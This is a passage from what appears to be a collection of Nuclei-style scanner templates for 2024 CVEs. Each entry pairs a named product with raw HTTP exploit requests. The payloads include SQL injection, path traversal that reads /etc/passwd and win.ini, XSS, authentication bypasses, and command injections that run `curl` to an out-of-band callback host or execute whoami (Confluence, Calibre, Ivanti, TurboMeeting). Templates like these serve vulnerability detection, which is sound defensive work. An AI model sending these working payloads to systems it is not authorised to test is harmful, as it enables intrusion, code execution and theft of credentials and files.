clientType=\"WEB\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["softwareVersion","eth0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2876","info":{"name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111\n"],"matchers":[{"type":"dsl","dsl":["duration>=4","status_code == 200","contains(header, \"application/json\")","contains_all(body, \"bulk_action\", \"_sent\", \"errortype\")"],"condition":"and"}]}]},{"id":"CVE-2024-32738","info":{"name":"CyberPower - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":\"finished\"","\"success\":","modifiedtime\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"modifiedtime\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-36117","info":{"name":"Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /javadoc/{{javadoc_path}}/raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"reposilite\") && contains(body,\"SQLite format\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2024-3495","info":{"name":"Wordpress Country State City Dropdown <=2.7.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+-\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"nonce\":\"(\\S*)\""],"internal":true}]}]},{"id":"CVE-2024-26331","info":{"name":"ReCrystallize Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Admin.aspx"],"headers":{"Cookie":"AdminUsername=admin"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ReCrystallize Server Administration","License Status:","System Info</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36991","info":{"name":"Splunk Enterprise - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /en-US/login HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Splunk Inc.\")"],"condition":"and","internal":true}]},{"raw":["GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2024-1208","info":{"name":"LearnDash LMS < 4.10.3 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"question_type\":","\"points_total\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28734","info":{"name":"Coda v.2024Q1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frameset cols=\"\"><frame src=\"javascript:alert(document.domain)\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2621","info":{"name":"Fujian Kelixin Communication - Command Injection","severity":"medium"},"requests":[{"raw":["@timeout 15s\nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"msg\\\":\",\"header\\\":\",\"code\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-29972","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account","severity":"critical"},"requests":[{"raw":["GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'result=0')"],"condition":"and"}]}]},{"id":"CVE-2024-8484","info":{"name":"REST API TO MiniProgram <= 4.7.1 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/rest-api-to-miniprogram\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /wp-json/watch-life-net/v1/comment/getcomments?order=DESC,(SELECT(1)FROM(SELECT(SLEEP(6)))a)--&postid=3&limit=1&page=1&page=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body, \"code\",\"success\",\"status\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-25852","info":{"name":"Linksys RE7000 - Command Injection","severity":"high"},"requests":[{"raw":["PUT /goform/AccessControl HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"AccessPolicy\":\"0\",\"AccessControlList\":\"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`\"}\n"]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1,\"result\",\"success\") && contains_all(body_2,\"PID\",\"USER\",\"VSZ\",\"STAT\",\"COMMAND\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-22024","info":{"name":"Ivanti Connect Secure - XXE","severity":"high"},"requests":[{"raw":["POST /dana-na/auth/saml-sso.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLRequest={{base64(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-8181","info":{"name":"Flowise <= 1.8.2 Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/apikey?/api/v1/ping HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nReferer: {{RootURL}}/document-stores\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiKey","apiSecret"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apiKey","part":"body","internal":false,"group":1,"regex":["\"apiKey\":\"([^\"]+)\""]}]}]},{"id":"CVE-2024-2389","info":{"name":"Progress Kemp Flowmon - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains(header, 'application/json') && contains(header, 'Flowmon')"],"condition":"and"}]}]},{"id":"CVE-2024-34257","info":{"name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/page/index.html\n\n{\n\"token\":\"\",\n\"apcliEncrypType\":\"`id>../{{file}}.txt`\",\n\"topicurl\":\"setWiFiExtenderConfig\"\n}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"success\": true"]},{"type":"regex","part":"body_2","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3850","info":{"name":"Uniview NVR301-04S2-P4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="],"condition":"and"},{"type":"word","part":"header","words":["NVRDVR"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4885","info":{"name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /NmAPI/RecurringReport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: http://tempuri.org/IRecurringReportServices/TestRecurringReport\n\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"><s:Body><TestRecurringReport xmlns=\"http://tempuri.org/\"><rr xmlns:a=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.RecurringReports.DataContracts\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"><a:AlternateHost i:nil=\"true\"/><a:Disabled>false</a:Disabled><a:EmailSettings xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:Authentication>None</b:Authentication><b:CredentialsId i:nil=\"true\"/><b:DirectoryPath>C:\\PROGRA~2\\Ipswitch\\WhatsUp\\Data\\ScheduledReports</b:DirectoryPath><b:Password/><b:Port>25</b:Port><b:SMTPServer/><b:SendFrom>WhatsUpGold@YourDomain.com</b:SendFrom><b:SendTo i:nil=\"true\"/><b:Subject>Emailing: Wireless Log</b:Subject><b:TimeoutSec>5</b:TimeoutSec><b:UseEncryptedConn>false</b:UseEncryptedConn><b:Username/></a:EmailSettings><a:ExportOptions><a:AuthorName>WhatsUp Gold</a:AuthorName><a:AutosizePDFPage>true</a:AutosizePDFPage><a:AvoidImageBreak>false</a:AvoidImageBreak><a:AvoidTextBreak>true</a:AvoidTextBreak><a:BrowserPageHeight>0</a:BrowserPageHeight><a:BrowserPageWidth>0</a:BrowserPageWidth><a:ConversionDelay>3</a:ConversionDelay><a:CustomPageHeight>0</a:CustomPageHeight><a:CustomPageWidth>0</a:CustomPageWidth><a:ExportAuthToken/><a:ExportType>html</a:ExportType><a:FitHeight>false</a:FitHeight><a:FitWidth>false</a:FitWidth><a:InternalLinksEnabled>false</a:InternalLinksEnabled><a:LiveURLsEnabled>false</a:LiveURLsEnabled><a:NavigationTimeout>240</a:NavigationTimeout><a:PageOrientation>Portrait</a:PageOrientation><a:PageSize>Letter</a:PageSize><a:PdfMessage>html</a:PdfMessage><a:PreviewEnabled>false</a:PreviewEnabled><a:Subject i:nil=\"true\"/><a:TimeFormat>g:i:s a</a:TimeFormat><a:Title i:nil=\"true\"/><a:ToMail>true</a:ToMail><a:WebExportDirectory>C:\\\\Program Files (x86)\\\\Ipswitch\\\\WhatsUp\\\\html\\\\NmConsole\\\\</a:WebExportDirectory><a:ZipEnabled>false</a:ZipEnabled></a:ExportOptions><a:IncludeURLInEmail>false</a:IncludeURLInEmail><a:Name>2e441d4d5a4b258b</a:Name><a:NextRun i:nil=\"true\"/><a:RecurringReportID>-1</a:RecurringReportID><a:Schedule xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:DailyDays>1</b:DailyDays><b:DailyOptions>Interval</b:DailyOptions><b:DaysOfTheWeek xmlns:c=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean></b:DaysOfTheWeek><b:MonthlyDayMonths>1</b:MonthlyDayMonths><b:MonthlyDayNumber>3</b:MonthlyDayNumber><b:MonthlyOptions>DayOfMonth</b:MonthlyOptions><b:MonthlyRecur>First</b:MonthlyRecur><b:MonthlyRecurDay>Sunday</b:MonthlyRecurDay><b:MonthlyRecurMonths>1</b:MonthlyRecurMonths><b:RecurringInterval>1</b:RecurringInterval><b:RecurringTimeIntervals>Minutes</b:RecurringTimeIntervals><b:ScheduleType>TimeInterval</b:ScheduleType><b:StartTime>2024-07-05T16:59:14.047957+01:00</b:StartTime><b:TimeIntervalStartDate>2024-07-05T16:59:14.047957+01:00</b:TimeIntervalStartDate><b:WeeklyWeeks>1</b:WeeklyWeeks><b:YearlyDayOfMonth>3</b:YearlyDayOfMonth><b:YearlyMonthRecur>First</b:YearlyMonthRecur><b:YearlyMonthRecurDay>Sunday</b:YearlyMonthRecurDay><b:YearlyMonths>March</b:YearlyMonths><b:YearlyOptions>DayOfYear</b:YearlyOptions><b:YearlyRecurMonth>March</b:YearlyRecurMonth></a:Schedule><a:URL>{\"title\":\"foo\",\"renderType\":\"aspx\",\"reports\":[{\"title\":\"thetitle\",\"url\":\"/NmConsole/api/Wireless/ReportWirelessLog\",\"dateRangeFilter\":{\"label\":\"Date Range\",\"n\":0,\"range\":\"Today\",\"text\":\"Today\"},\"severityFilter\":{\"label\":\"Severity\",\"value\":-1,\"text\":\"ALL\"},\"limit\":50,\"grid\":{\"emptyText\":\"[ No records found ]\",\"columns\":[{\"dataIndex\":\"Date\",\"text\":\"Date\",\"flex\":1},{\"dataIndex\":\"Severity\",\"text\":\"Severity\",\"flex\":1},{\"dataIndex\":\"Message\",\"text\":\"Message\",\"flex\":1}],\"filters\":[],\"sorters\":[]}}],\"baseUrl\":\"http://{{interactsh-url}}\",\"userId\":1}</a:URL><a:WebUserID>1</a:WebUserID><a:WebUserName>admin</a:WebUserName></rr></TestRecurringReport></s:Body></s:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["sPassword"]}]}]},{"id":"CVE-2024-0250","info":{"name":"Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-41628","info":{"name":"Cluster Control CMON API - Directory Traversal","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"ClusterControl\",\"CMON_API\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../..//etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1061","info":{"name":"WordPress HTML5 Video Player - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header, \"application/json\")","contains_all(body, \"created_at\", \"video_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-27497","info":{"name":"Linksys E2000 1.0.06 position.js Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/position.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var session_key","close_session","HELPPATH"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-40348","info":{"name":"Bazarr < 1.4.3 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login"],"matchers":[{"type":"word","part":"body","words":["<title>Bazarr</title>","content=\"Bazarr","window.Bazarr"],"condition":"or","internal":true}]},{"method":"GET","path":["{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-10081","info":{"name":"CodeChecker <= 6.24.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /v6.58/Products/Authentication HTTP/1.1\nHost: {{Hostname}}\n\n[1,\"getProducts\",1,1,{}]\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{\\\"0\\\":{\\\"lst\\\":[\\\"rec\\\",\")","!contains(body,'Error code 401: Unauthorized')","contains(header,'application/x-thrift')"],"condition":"and"}]}]},{"id":"CVE-2024-5421","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/info/dir?/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/var/tmp</td>","File System Info","face=\"courier"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5947","info":{"name":"Deep Sea Electronics DSE855 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Copyright Deep Sea Electronics\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /Backup.bin HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"Unknown\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-48360","info":{"name":"Qualitor <= v8.24 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"qualitor\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /html/ad/adformmobile/request/viewValidacao.php?url=oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5932","info":{"name":"GiveWP - PHP Object Injection","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/give_forms/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"type\":","\"guid\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".[0].slug"]},{"type":"json","part":"body","name":"give-form-title","internal":true,"json":[".[0].title.rendered"]},{"type":"json","part":"body","name":"links","internal":true,"json":[".[0].link"]}]},{"raw":["GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["give-form-hash","give-form-id-prefix"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"give-form-hash","internal":true,"regex":["name=\"give\\-form\\-hash\" value=\"([0-9a-z]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id-prefix","internal":true,"regex":["name=\"give\\-form\\-id\\-prefix\" value=\"([0-9-]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id","internal":true,"regex":["name=\"give\\-form\\-id\" value=\"([0-9]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-amount","internal":true,"regex":["give\\-form\\-minimum\"\\n\\s+value=\"([0-9.]+)\"\\/>"]}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ngive-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"error_data\"","\"unknown_error\""],"condition":"and"}]}]},{"id":"CVE-2024-8963","info":{"name":"Ivanti Cloud Services Appliance - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/index.php%3F.php/gsb/users.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Ivanti Cloud Services Appliance","User name","Set Password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21683","info":{"name":"Atlassian Confluence Data Center and Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log+in&os_destination=\n","POST /doauthenticate.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\npassword={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action\n","POST /admin/plugins/newcode/addlanguage.action HTTP/1.1\nHost: {{Hostname}}\nX-Atlassian-Token: no-check\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE\n\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"languageFile\";filename=\"{{randstr}}.js\"\nContent-type: text/javascript\n\nnew java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"curl\",\"{{interactsh-url}}\"]).start()\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"newLanguageName\"\n\n{{randstr}}\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE--\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 302","contains(interactsh_protocol, 'dns')","contains(body_3, \"confluence\")"],"condition":"and"}]}]},{"id":"CVE-2024-7928","info":{"name":"FastAdmin < V1.3.4.20220530 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET /index/ajax/lang?lang=../../application/database HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["jsonpReturn(","\"password\":","\"username\":","\"database\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/javascript"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-8673","info":{"name":"Z-Downloads < 1.11.7 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=z-downloads-add-file HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]},{"raw":["POST /wp-admin/admin.php?page=z-downloads-files HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------191511049038951322013765412437\n\n-----------------------------191511049038951322013765412437\nContent-Disposition: form-data; name=\"file\"; filename=\"xss.svg\"\nContent-Type: image/svg+xml\n\n<svg xmlns=\"http://www.w3.org/2000/svg\">\n<polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"/>\n<script type=\"text/javascript\">alert(document.domain);</script>\n</svg>\n\n-----------------------------191511049038951322013765412437\nContent-Disposition: form-data; name=\"nonce\"\n\n{{nonce}}\n-----------------------------191511049038951322013765412437\nContent-Disposition: form-data; name=\"submit\"\n\nUpload\n-----------------------------191511049038951322013765412437--\n","GET /wp-admin/admin.php?page=z-downloads-files HTTP/1.1\nHost: {{Hostname}}\n","GET /{{payloadurl}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(content_type_5, \"image/svg+xml\")","contains(body_5, \"<script type=\\\"text/javascript\\\">alert(document.domain);</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"payloadurl","part":"body","regex":["/wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss\\.svg"],"internal":true}]}]},{"id":"CVE-2024-6782","info":{"name":"Calibre <= 7.14.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\n    [\"template\"],\n    \"\",\n    \"\",\n    \"\",\n    {{book_ids}},\n   \"python:def evaluate(a, b):\\n  import subprocess\\n  try:\\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\\n  except Exception:\\n    return subprocess.check_output(['sh', '-c', 'whoami'])\\n\"\n]\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["b'([^']+)"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38288","info":{"name":"TurboMeeting - Post-Authentication Command Injection","severity":"high"},"requests":[{"raw":["POST /as/wapi/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnext_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login\n"],"matchers":[{"type":"word","part":"body","words":["as/wapi/profile_entry?sid="],"internal":true}],"extractors":[{"type":"regex","name":"sid","part":"body","group":1,"regex":["sid=(.*?)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /as/wapi/generate_csr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsid={{sid}}&common_name=1\"%20out%20/dev/null\"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CSR","SSL"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-1380","info":{"name":"Relevanssi (A Better Search) <= 4.22.0 - Query Log Export","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=&relevanssi_export=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"filename=relevanssi_log.csv\", \"application/download\")","contains_all(body, \"user_id\", \"session_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-5230","info":{"name":"FleetCart 4.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en/products?query=123"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"razorpayKeyId:\", \"loggedIn:\", \"storeName:\")","status_code == 200"],"condition":"and"},{"type":"word","words":["razorpayKeyId: ''"],"negative":true}]}]},{"id":"CVE-2024-32399","info":{"name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webeditor/../../../windows/win.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"[fonts]\", \"for 16-bit app support\")","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32640","info":{"name":"Mura/Masa CMS - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nobject=displayregion&contenthistid=x\\'&previewid=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(header, \"application/json\")","contains_all(body, \"Unhandled Exception\")","contains_all(header,\"cfid\",\"cftoken\")"],"condition":"and"}]}]},{"id":"CVE-2024-21887","info":{"name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","severity":"critical"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"result\":","\"message\":"],"condition":"and"}]}]},{"id":"CVE-2024-33724","info":{"name":"SOPlanning 1.52.00 Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST 